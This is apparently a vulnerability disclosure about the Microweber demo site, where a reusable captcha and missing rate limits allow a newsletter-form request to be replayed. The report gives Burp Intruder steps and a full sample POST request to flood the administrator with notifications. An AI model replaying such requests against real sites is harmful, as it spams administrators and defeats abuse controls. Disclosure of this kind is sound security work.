Description

There are no rate limits and reuse of captcha is allowed resulting in reuse of same captcha to issue notifications to administrator

Proof of Concept

Capture the newsletter subscription flow in burp and continue with entering email & captcha until below POST form request is captured. Then use this in burp intruder to issue as many notifications with replay of same captcha.

Sample Request

POST /demo/api/post_form HTTP/1.1 Host: demo.microweber.org Cookie: laravel_session=kcTjGuBIPY5gQLMzQ7KLvp0cv0EQQz2nfJEcPKAE; csrf-token-data=%7B%22value%22%3A%22SCWkLefQrigbTe92em37PL4qEBKnLg7ZvVewn60f%22%2C%22expiry%22%3A1646569870269%7D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demo.microweber.org/demo/forgot_password Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 137 Origin: https://demo.microweber.org Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close

_token=SCWkLefQrigbTe92em37PL4qEBKnLg7ZvVewn60f&for_id=footer_newsletter&for=module&email=b%40a.com&module_name=contact_form&captcha=4405

Impact

This vulnerability is capable of issuing many notifications to administrator